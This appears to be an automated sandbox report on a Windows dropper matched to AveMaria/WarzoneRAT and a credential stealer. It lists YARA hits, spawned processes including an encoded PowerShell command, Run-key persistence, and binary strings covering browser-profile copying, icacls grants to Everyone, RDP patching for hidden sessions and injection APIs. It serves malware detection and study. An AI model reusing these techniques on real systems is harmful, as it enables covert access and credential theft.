Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: GetRawInputData

              E-Banking Fraud

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              System Summary

Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 | Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding command execution via IExecuteCommand COM object | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AveMaria/WarzoneRAT | Author: ditekSHen
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AveMaria_31d2bce9 | Author: unknown
Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE | Matched rule: AveMaria_WarZone | Author: unknown
Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 | Author: unknown
Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 | Author: unknown
Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AveMaria_31d2bce9 | Author: unknown
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.375d740.5.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE, Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_WarzoneRAT author = ditekSHen, description = Detects AveMaria/WarzoneRAT
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.3735720.4.raw.unpack, type: UNPACKEDPE, Matched rule: AveMaria_WarZone Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_AveMaria_31d2bce9 reference_sample = 5767bca39fa46d32a6cb69ef7bd1feaac949874768dac192dbf1cf43336b3d7b, os = windows, severity = x86, creation_date = 2021-05-30, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AveMaria, fingerprint = 8f75e2d8308227a42743168deb021de18ad485763fd257991c5e627c025c30c0, id = 31d2bce9-3266-447b-9a2d-57cf11a0ff1f, last_modified = 2021-08-23
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Code function: 0_2_00BBA5A8
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Code function: 0_2_00BBD038
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_04D4C258
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_04D4C2E3
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EAA5D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EAC030
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EA9271
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EABC30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EA6740
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EA62D0
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EAA278
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EC9E80
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EC0620
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EC7B70
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.581928376.000000000259B000.00000004.00000800.00020000.00000000.sdmp, Binary or memory string: OriginalFilename vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.591838998.0000000007200000.00000004.08000000.00040000.00000000.sdmp, Binary or memory string: OriginalFilenameLrqcelzadlkdb.dll" vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.578114187.00000000003E8000.00000004.00000010.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameUNKNOWN_FILET vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Binary or memory string: OriginalFilenameDjkblrrkcs.exe4 vs SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Mqombsglp.exe.0.dr, Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, File read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: unknown, Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" Get-Date
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/release
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAANAA1AA==
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ipconfig/renew
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /renew
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, File created: C:\Users\user\AppData\Roaming\Meiilnstlz
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhdrfzpc.o2h.ps1
              Source: classification engine, Classification label: mal100.troj.evad.winEXE@17/8@6/2
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, File read: C:\Users\user\Desktop\desktop.ini
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4808:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:488:120:WilError_01
              Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, File read: C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static file information: File size 1056256 > 1048576
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static PE information: Raw size of .text is bigger than: 0x100000 < 0x101400
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: >+D C:\Users\W7H64\source\repos\Ring3 CRAT x64\Ring3 CRAT x64\nope.pdb source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, u0005.cs, .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: Mqombsglp.exe.0.dr, u0005.cs, .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: 0.0.SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe.150000.0.unpack, u0005.cs, .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EA6E08 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EA6DF2 push eax; ret
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Code function: 1_2_07EC4ED1 push eax; mov dword ptr [esp], ecx
              Source: initial sample, Static PE information: section name: .text entropy: 7.999494429591008

              Persistence and Installation Behavior

              Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /release
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, File created: C:\Users\user\AppData\Roaming\Meiilnstlz\Mqombsglp.exe
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Mqombsglp

              Hooking and other Techniques for Hiding and Protection

              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588968123.000000000375D000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.582069242.00000000025B8000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
              Source: SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, 00000000.00000002.588726447.0000000003735000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: 0.rudp\ICACLS.exe\xcopy.exe "" /GRANT:r *S-1-1-0:(OI)(CI)F /T\AppData\Local\Google\AppData\Local\Google\xcopy.exe /Y /E /C \AppData\Roaming\Mozilla\AppData\Roaming\Mozilla\\AppData\Roaming\Microsoft\AppData\Roaming\Microsoft\\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AppData\Local\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\TermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameTypemultirdp[experimental] patch Terminal Server service to allow multiples userstermsrv.dllexplorer.exeTASKmgr.exeProcessHacker.exeregedit.exentdll.dllLdrGetProcedureAddressRtlNtStatusToDosErrorRtlSetLastWin32ErrorNtAllocateVirtualMemoryNtProtectVirtualMemoryNtWriteVirtualMemoryLdrLoadDllRtlCreateUserThread
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.9148.20800.exe, Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
